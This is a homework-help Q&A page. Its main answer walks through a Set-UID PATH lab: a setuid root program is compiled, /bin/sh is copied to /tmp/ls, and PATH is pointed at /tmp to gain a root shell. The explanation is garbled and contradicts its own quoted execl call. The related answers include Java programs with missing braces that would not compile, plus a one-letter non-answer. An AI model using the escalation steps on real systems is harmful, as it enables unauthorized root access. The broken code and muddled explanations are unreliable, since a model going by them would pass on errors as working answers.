All categories

3 years ago

The PATH environment variable.

Computers and Technology

1 answer:

enot [183]3 years ago

8 0

Answer:

Answer explained below

Explanation:

Yes, you can let Set-uid program that is owned by root to run your code instead of /bin/ls but it has it's own drawbacks and is actually not safe.

As you can not rely on that since some of the shells if different from the ruid drop an euid which is actually not safe.

execl("/bin/ls", "ls",(char *)0);

run this under your main program.

Since it can have a root previlege,

-$ cd /tmp/

/tmp$ sudo su

:/tmp# gcc -o system system.c

:/tmp# chmod u+s system // changing file permissions

:/tmp# exit

exit

:/tmp$ cp /bin/sh /tmp/ls

:/tmp$ ./system

Steps:

1. The first thing you need to do is copy /bin/sh to /tmp.

2. After copying /bin/sh to /tmp set a new name ls but make sure your sh ->.zsh.

3. Set PATH to current directory. /tmp.

4. Compile

5. Run the program system and you can get your root previledge.

Now, with the above exmaple if you change /bin/sh soo that it points back to /bin/bash and repeat all the previous steps, you will not be able to get your root previledges.

You might be interested in

You should process the tokens by taking the first letter of every fifth word,starting with the first word in the file. Convert t

zhenek [66]

Answer:

See explaination

Explanation:

import java.io.File;

import java.io.IOException;

import java.util.Scanner;

import java.util.StringTokenizer;

public class SecretMessage {

public static void main(String[] args)throws IOException

{

File file = new File("secret.txt");

StringBuilder stringBuilder = new StringBuilder();

String str; char ch; int numberOfTokens = 1; // Changed the count to 1 as we already consider first workd as 1

if(file.exists())

{

Scanner inFile = new Scanner(file);

StringTokenizer line = new StringTokenizer(inFile.nextLine()); // Since the secret.txt file has only one line we dont need to loop through the file

ch = line.nextToken().toUpperCase().charAt(0); // Storing the first character of first word to string builder as mentioned in problem

stringBuilder = stringBuilder.append(ch);

while(line.hasMoreTokens()) { // Looping through each token of line read using Scanner.

str= line.nextToken();

numberOfTokens += 1; // Incrementing the numberOfTokens by one.

if(numberOfTokens == 5) { // Checking if it is the fifth word

ch = str.toUpperCase().charAt(0);

stringBuilder = stringBuilder.append(ch);

numberOfTokens =0;

}

System.out.println("----Secret Message----"+ stringBuilder);

}

5 0

3 years ago

A JOB LEADS SOURCE LIST is used to help record all of the job leads you can find. It includes contact information and a plan for

Amiraneli [1.4K]

Answer:t

Explanation:

8 0

2 years ago

If you want to stop a loop before it goes through all of its iterations, the break statement may be used. Group of answer choice

NeX [460]

Answer:

Answer is true

Explanation:

6 0

1 year ago

If we assume the modern view of existential import, why is the following syllogism invalid? No computer is made of clay. All com

Papessa [141]

Answer:

because the conclusion is not in agreement with the two premises.

Explanation:

Remember, the term syllogism refers to the form of reasoning that draws its conclusion based on the stated premises. In other words, a conclusion is reached if it satisfies all or part of the premises.

In this case, the statement "No computer is made of clay" and "All computers are electronic devices" should be inferred to mean, No electronic devices are made of clay" not "Some electronic devices are not made of clay," since the two premises neither suggest that electronic devices are made from clay.

5 0

2 years ago

This program will store roster and rating information for a soccer team. Coaches rate players during tryouts to ensure a balance

aksik [14]

Answer:

import java.util.Scanner;

public class TeamRoster {

public static void main(String[] args) {

Scanner scan = new Scanner(System.in);

int[][] players = new int[5][2];

boolean keepAlive = true;

char input;

for (int i = 0; i < 5; i++) {

System.out.println("Enter player " + (i+1) + "'s jersey number: ");

players[i][0] = scan.nextInt();

if( players[i][0] >= 0 && players[i][0] < 100 ) {

System.out.println("Enter player number less than 100");

System.out.println("Enter player " + (i+1) + "'s rating: ");

players[i][1] = scan.nextInt();

if ( players[i][1] >= 1 && players[i][1] <10 ) {

System.out.println();

} else {

System.out.println("Enter player " + (i+1) + "'s rating: ");

players[i][1] = scan.nextInt();

}

System.out.println();

outputRoster(players, 0);

while (keepAlive) {

outputMenu();

input = scan.next().charAt(0);

if (input == 'q') {

keepAlive = false;

break;

} else if (input == 'o') {

outputRoster(players, 0);

} else if (input == 'u') {

System.out.println("Enter a jersey number: ");

int jerseyNum = scan.nextInt();

System.out.println("Enter a new rating for the player: ");

int newRating = scan.nextInt();

for (int l = 0; l < 5; l++) {

if (players[l][0] == jerseyNum) {

players[l][1] = newRating;

}

} else if (input == 'a') {

System.out.println("Enter a rating: ");

int rating = scan.nextInt();

outputRoster(players, rating);

} else if (input == 'r') {

System.out.println("Enter a jersey number: ");

int jerseyNum = scan.nextInt();

boolean exists = true;

for (int l = 0; l < 5; l++) {

if (players[l][0] == jerseyNum) {

System.out.println("Enter a new jersey number: ");

players[l][0] = scan.nextInt();

System.out.println("Enter a rating for the new player: ");

players[l][1] = scan.nextInt();

}

return;

}

public static void outputRoster(int[][] players, int min) {

System.out.println(((min>0) ? ("ABOVE " + min) : ("ROSTER")));

int item = 1;

for (int[] player : players) {

if (player[1] > min) {

System.out.println("Player " + item + " -- Jersey number: " + player[0] + ", Rating: " + player[1]);

}

item++;

}

System.out.println();

}

public static void outputMenu() {

System.out.println("MENU");

System.out.println("u - Update player rating");

System.out.println("a - Output players above a rating");

System.out.println("r - Replace player");

System.out.println("o - Output roster");

System.out.println("q - Quit\n");

System.out.println("Choose an option: ");

}

Explanation:

The program is written in Java.

It is a bit straightforward.

The Scanner module is declared and used to collect input from the user.

The program prompts the user for each player jersey then rating.

All five players details are collected.

The program shows the output of all the entries.

5 0

3 years ago